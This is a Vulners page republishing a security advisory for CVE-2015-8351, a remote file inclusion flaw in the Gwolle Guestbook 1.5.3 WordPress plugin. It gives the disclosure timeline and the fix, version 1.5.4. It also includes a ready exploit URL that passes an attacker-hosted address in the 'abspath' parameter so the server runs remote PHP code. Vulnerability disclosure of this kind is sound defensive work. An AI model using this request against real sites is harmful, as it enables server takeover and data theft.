Vulners
Lucene search
WordPress Gwolle Guestbook 1.5.3 Remote File Inclusion Vulnerability
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2015-8351 | 23 Aug 201613:24 | – | circl |
 | Gwolle Guestbook WordPress Plugin Remote File Inclusion Vulnerability | 1 Dec 201500:00 | – | cnvd |
 | WordPress Gwolle Guestbook Plugin Remote File Inclusion (CVE-2015-8351) | 16 Dec 201500:00 | – | checkpoint_advisories |
 | CVE-2015-8351 | 11 Sep 201720:00 | – | cve |
 | CVE-2015-8351 | 11 Sep 201720:00 | – | cvelist |
 | WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | 3 Dec 201500:00 | – | exploitdb |
 | WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | 3 Dec 201500:00 | – | exploitpack |
 | Remote File Inclusion in Gwolle Guestbook WordPress Plugin | 14 Oct 201500:00 | – | htbridge |
 | CVE-2015-8351 | 11 Sep 201720:29 | – | nvd |
 | WordPress Gwolle Guestbook Plugin < 1.5.4 RFI Vulnerability | 12 Sep 201700:00 | – | openvas |
10
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication: October 14, 2015 [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.
HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.
Successful exploitation of this vulnerability will lead to entire WordPress installation compromise, and may even lead to the entire web server compromise.
-----------------------------------------------------------------------------------------------
Solution:
Update to Gwolle Guestbook 1.5.4
More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/
# 0day.today [2018-01-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.69448